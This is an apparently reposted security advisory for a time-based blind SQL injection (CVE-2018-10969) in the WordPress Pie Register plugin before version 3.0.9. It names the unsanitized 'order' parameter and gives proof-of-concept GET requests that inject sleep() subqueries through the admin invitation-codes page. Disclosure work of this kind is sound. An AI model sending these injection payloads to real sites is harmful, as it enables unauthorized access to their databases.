WordPress Pie Register Plugin < 3.0.9 - Blind SQL Injection Vulnerability

# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
# Author: Manuel García Cárdenas
# Software: WordPress Plugin Pie Register 3.0.9
# CVE: CVE-2018-10969
 
# I. VULNERABILITY
# WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection
 
# II. BACKGROUND
# Pie-Register is a quick and easy way to brand your Registration Pages on
# WordPress sites.
 
# III. DESCRIPTION
# This bug was found using the portal in the files:
# /pie-register/classes/invitation_code_pagination.php:    if ( isset(
# $_GET['order'] ) && $_GET['order'] )
# /pie-register/classes/invitation_code_pagination.php:    $order =
# $_GET['order'];
# And when the query is executed, the parameter "order" it is not sanitized.
# /pie-register/classes/invitation_code_pagination.php:    $this->order = esc_sql( $order );
 
# IV. PROOF OF CONCEPT
# The following URL have been confirmed to all suffer from Time Based SQL Injection.
 
GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc
(original)
 
GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a)
HTTP/1.1(2 seconds of response)
 
GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a)
HTTP/1.1(30 seconds of response)

#  0day.today [2018-06-11]  #